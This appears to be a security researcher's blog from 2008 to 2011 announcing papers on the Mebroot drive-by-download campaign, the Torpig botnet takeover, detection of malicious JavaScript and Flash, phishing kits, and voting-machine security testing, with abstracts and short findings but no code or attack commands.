blog
June 22, 2011
We have recently presented our paper Peering through the iFrame at the INFOCOM mini-conference.
In this paper, we look in-depth into a drive-by-download campaign, the one used to spread the Mebroot malware. In a way, this paper is an ideal continuation of our earlier investigations of the Mebroot/Torpig botnet; more in general, however, it aims at providing a snapshot (as comprehensive as possible) of a modern drive-by-download campaign. Mebroot is not the most pervasive or widespread drive-by-download campaign (during our monitoring, it affected "only" several thousands domains), but it is long-lasting and quite successful, and therefore it makes for an interesting subject of study.
We started off our study with the goal of gaining a better understanding of all the parties involved in a drive-by-download campaign: the attackers (what is their modus operandi? what infrastructure do they rely on for running the campaign?); the legitimate web sites that get compromised to drive traffic to exploit sites (which sites are targeted? do they notice they have been compromised? how long does it take for them to cleanup?); and the final potential victims of the attacks (are they indeed vulnerable to the attacks? what is the actual infection rate?)
To answer these questions, we needed to get visibility into the
operations of the drive-by-download campaign, and, as in our previous
studies on Mebroot, we obtained it by infiltrating the Mebroot's
infrastructure. A little bit of background is necessary to understand
how this worked in practice.
As in other drive-by-download attacks, the Mebroot campaign compromises
legitimate web sites with code that redirects the visitors of these
sites to the campaign's exploit sites (where the actual exploits are
launched). In the Mebroot case, the injected code uses domain
generation algorithms (DGAs) to dynamically generate the name of the
exploit sites where victims are sent to (instead of having their names
statically hard-coded). In practice, every so often (from one day to a
few days), the DGAs generate a different domain name, thus they redirect
victims to a different exploit site.
This presumably is done to be more resilient to take-down attempts: in
the traditional model (hard-coded exploit sites), whenever the current
exploit site is blocked, the campaign is effectively disabled: all the
legitimate web sites that an attacker has compromised of suddenly become
useless, because they point to a disabled domain.
On the contrary, in the Mebroot case, the disruption caused by taking
down the current exploit sites is only temporary: as soon as the DGAs
generate a new exploit site, the campaign is active again and the sites
that were compromised in the past resume sending their victims to the
new exploit site.
However, DGAs also open a window of opportunity for defenders. In particular, we were able to register some of the domain names that were to be used in the campaign. As a consequence, for several days over a period of almost a year, our own servers were used in the campaign in place of the actual exploit sites. Of course, our servers simply monitored the traffic they received and performed several measurements of their visitors.
This monitoring gave us a lot of interesting information; for all the results, refer to the full paper. Here are two findings (on the final target of the attacks and on the compromised web sites) that I think are particularly interesting.
How vulnerable really are the users that are redirected to exploit sites? Quite a bit. During our study, we found that roughly between 60% and 80% of the visitors used at least one browser plugin that was known to be vulnerable. Between 30% and 40% of the users we observed was vulnerable to one of the exploits used in the Mebroot drive-by-download campaign. Clearly, these are very worrying statistics. To be precise, these are upper bounds on the actual infection rates: from our vantage point, we could not determine whether an exploit was successful—an attack could be blocked by a host-based defense mechanism, such as an anti-virus tool. In any case, the potential for infection (and the lack of updating and patching) is staggering.
Switching our attention to the compromised web sites that expose their users to exploits, do they realize that they have been compromised, and, if so, do they clean up and remediate the infection? Not really. Almost 20% of the compromised web sites remained infected during our entire monitoring period. Those that did clean up, did so very slowly: after 25 days only half of the sites had removed the malicious code.
For more results, stats, and graphs, check out the paper. Here is the abstract:
Drive-by-download attacks have become the method of choice for cyber-criminals to infect machines with malware. Previous research has focused on developing techniques to detect web sites involved in drive-by-download attacks, and on measuring their prevalence by crawling large portions of the Internet. In this paper, we take a different approach at analyzing and understanding drive-by-download attacks. Instead of horizontally searching the Internet for malicious pages, we examine in depth one drive-by-download {\em campaign}, that is, the coordinated efforts used to spread malware. In particular, we focus on the Mebroot campaign, which we periodically monitored and infiltrated over several months, by hijacking parts of its infrastructure and obtaining network traces at an exploit server.
By studying the Mebroot drive-by-download campaign from the inside, we could obtain an in-depth and comprehensive view into the entire life-cycle of this campaign and the involved parties. More precisely, we could study the security posture of the victims of drive-by attacks (e.g., by measuring the prevalence of vulnerable software components and the effectiveness of software updating mechanisms), the characteristics of legitimate web sites infected during the campaign (e.g., the infection duration), and the {\em modus operandi} of the miscreants controlling the campaign.
April 14, 2011
Some time ago, the IEEE Security & Privacy magazine accepted our paper Analysis of a Botnet Takeover, a new version of our CCS paper on Torpig.
The main differences with older versions of this work are two. First, we removed some of the more academic parts and rewrote the text to make it more appealing to a general readership. Second, and more interestingly, we added an "Aftermath" section, where we look back at the Mebroot/Torpig botnet one year after the original take-over, at the light of new data we collected since then. The main conclusions of this updated look at Torpig, unfortunately, were that the botnet has evolved, becoming more sophisticated and arguably harder to take over, and has remained relatively stable in size.
Some asked if our research ended up helping the bad guys, for example, revealing a weakness in their operations (the hijackability of their C&C system) and prompting them at fixing it. The answer is no: the possibility of hijacking DGA-based botnets was proved beyond any doubt, roughly at the same time, by the Conficker Working Group, who successfully stalled Conficker by sinkholing they domains it relies on for rendezvous.
Another question we are often asked is whether it would have been to possible to stop the botnet, by using some kind of "kill switch" or "kill command". This has long been considered a no-starter in the security community due to its possible unintended consequences. The classic argument goes typically as follows: it is very hard to test the correct functionality of this kill switch (if it exists) on all possible configurations of infected machines; therefore, it may be possible that the kill command causes a crash on some configuration. What if the machines that are so affected happen to be performing some critical task (for example, controlling health equipment)? It is very likely that this stance will be rediscussed at the light of the recent Coreflood takedown, in which a kill command was employed to neuter Coreflood bots.
The Coreflood takedown, and similar earlier actions, also indicates a possible answer to another common question: how to actually take down this botnet? The combinations of sinkholing, active stopping, and legal actions have given so far the most effective results. It remains to be seen if concerns about unintended consequences and intervention of governments on individuals' computers will prevent more widespread uses of this tactic.
We also added to the paper a fairly comprehensive discussion of the ethical and legal aspects of our research, both to clarify what we did and why and to help researchers in a similar position to ours. Yet again, I'm sure that the Coreflood takedown will spark new discussions on these topics.
Here is the paper abstract:
Botnets, networks of malware-infected machines that are controlled by an adversary, are the root cause of a large number of security problems on the Internet. A particularly sophisticated and insidious type of bot is Torpig, a malware program that is designed to harvest sensitive information (such as bank account and credit card data) from its victims. In this paper, we report on our efforts to take control of the Torpig botnet and study its operations for a period of ten days. During this time, we observed more than 180 thousand infections and recorded almost 70 GB of data that the bots collected. While botnets have been "hijacked" and studied previously, the Torpig botnet exhibits certain properties that make the analysis of the data particularly interesting. First, it is possible (with reasonable accuracy) to identify unique bot infections and relate that number to the more than 1.2 million IP addresses that contacted our command and control server. Second, the Torpig botnet is large, targets a variety of applications, and gathers a rich and diverse set of data from the infected victims. This data provides a new understanding of the type and amount of personal information that is stolen by botnets.
April 28, 2010
Tomorrow, I'm going to present our paper Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code at the WWW conference. The paper describes some of the techniques that we use to detect and analyze web pages that perform drive-by-download attacks, such as the ones that we analyze via Wepawet.
Here is the abstract:
JavaScript is a browser scripting language that allows developers to create sophisticated client-side interfaces for web applications. However, JavaScript code is also used to carry out attacks against the user's browser and its extensions. These attacks usually result in the download of additional malware that takes complete control of the victim's platform, and are, therefore, called "drive-by downloads." Unfortunately, the dynamic nature of the JavaScript language and its tight integration with the browser make it difficult to detect and block malicious JavaScript code.
This paper presents a novel approach to the detection and analysis of malicious JavaScript code. Our approach combines anomaly detection with emulation to automatically identify malicious JavaScript code and to support its analysis. We developed a system that uses a number of features and machine-learning techniques to establish the characteristics of normal JavaScript code. Then, during detection, the system is able to identify anomalous JavaScript code by emulating its behavior and comparing it to the established profiles. In addition to identifying malicious code, the system is able to support the analysis of obfuscated code and to generate detection signatures for signature-based systems. The system has been made publicly available and has been used by thousands of analysts.
See you in Raleigh!
December 10, 2009
Today, Sean Ford is going to present our paper Analyzing and Detecting Malicious Flash Advertisements at the ACSAC Conference.
The paper describes some of the techniques we use to detect malicious Flash files. More precisely, we focused on two main threats:
Flash-based malvertisements that automatically redirect victims to
malicious or questionable pages. This type of malware essentially
exploits a design flaw in the current advertisement technology: the
Flash language and its run time, as implemented in today's browsers, are
too powerful and too unrestricted. To put it more plainly, why
should an advertisement be able to hijack the browser?
A possible solution here (which we do not explore in the paper) would be
to identify a secure subset of Flash and restrict Flash-based
advertisement to this subset. Of course, similar work has already been
done in the JavaScript camp, see ADSafe or
Caja for example, so many
lessons could probably be reused.
Malformed Flash files that exploit vulnerabilities in common Flash players, typically, Adobe's player. This type of malware exploits classic implementation problems (buffer overflows, integer overflows, etc.).
The paper also describes in some detail a number techniques that are used in malicious Flash files to evade detection (trigger-based behavior, timezone checks, etc.) and obfuscate the malicious code.
Here is the abstract:
The amount of dynamic content on the web has been steadily increasing, and sites now offer user experiences that come close to those found when running local native applications. Advanced scripting languages such as JavaScript and Adobe's Flash have been instrumental in delivering dynamic content on the Internet. Dynamic content has also become popular in advertising, where Flash has achieved success allowing the creation of rich, interactive ads that are displayed on hundreds of millions of computers per day. The success of Flash-based applications and advertisements attracted the attention of malware authors who use Flash to deliver attacks through advertising networks. This paper presents a novel approach whose goal is to automate the analysis of Flash content to identify malicious behavior. We designed and implemented a tool based on the approach, we made it available to the world, and we tested it on a large corpus of real-world Flash ads. The results show that our tool is able to reliably detect malicious Flash ads with very limited false positives.
July 27, 2008
Tomorrow, I'm going to present our paper There is No Free Phish: An Analysis of "Free" and Live Phishing Kits at the USENIX WOOT Workshop. The paper talks about phishing kits, which are phishing sites in a ready-to-deploy package. We collected a large number of these kits, both from sites distributing them and live phishing web servers. We found that phishing kits really are a double-edged sword: on one hand, phishers use them to get confidential information from unsuspecting victims; on the other hand, more experienced attackers plant backdoors in these kits through which they covertly receive the information phished by the kits' users.
Here is the abstract:
Phishing is a form of identity theft in which an attacker attempts to elicit confidential information from unsuspecting victims. While in the past there has been significant work on defending from phishing, much less is known about the tools and techniques used by attackers, i.e., phishers. Of particular importance to understanding the phishers' methods and motivations are phishing kits, packages that contain complete phishing web sites in an easy-to-deploy format. In this paper, we study in detail the kits distributed for free in underground circles and those obtained by crawling live phishing sites. We notice that phishing kits often contain backdoors that send the entered information to third parties. We conclude that phishing kits target two classes of victims: the gullible users from whom they extort valuable information and the unexperienced phishers who deploy them.
After WOOT, I'm going to attend USENIX Security.
See you in San Jose!
July 21, 2008
Tomorrow, the International Symposium on Software Testing and Analysis (ISSTA) starts in Seattle. It is one of the main venues for research on testing and software analysis.
This year, we have a paper there. It is Are Your Votes Really Counted? Testing the Security of Real-world Electronic Voting Systems and it is joint work with quite a few people in the Computer Security Lab (Davide Balzarotti, Greg Banks, myself, Viktoria Felmetsger, Richard Kemmerer, William Robertson, Fredrik Valeur, and Giovanni Vigna). The paper is the result of our experience with the California Top-To-Bottom Review of electronic voting machines and the similar EVEREST project in Ohio. We describe the methodology we used to perform red-team testing of two real-world electronic voting systems (one produced by Sequoia, the other by ES&S), the tools and techniques we developed, some of the vulnerabilities we identified (spoiler: we designed and implemented malicious code capable of spreading from machine to machine in both cases), and the lessons we learned in the process.
Here is the abstract:
Electronic voting systems play a critical role in today's democratic societies, as they are responsible for recording and counting the citizens' votes. Unfortunately, there is an alarming number of reports describing the malfunctioning of these systems, suggesting that their quality is not up to the task. Recently, there has been a focus on the security testing of voting systems to determine if they can be compromised in order to control the results of an election. We have participated in two large-scale projects, sponsored by the Secretaries of State of California and Ohio, whose respective goals were to perform the security testing of the electronic voting systems used in those two states. The testing process identified major flaws in all the systems analyzed, and resulted in substantial changes in the voting procedures of both states. In this paper, we describe the testing methodology that we used in testing two real-world electronic voting systems, the findings of our analysis, and the lessons we learned.
If you are attending the conference, see you in Seattle!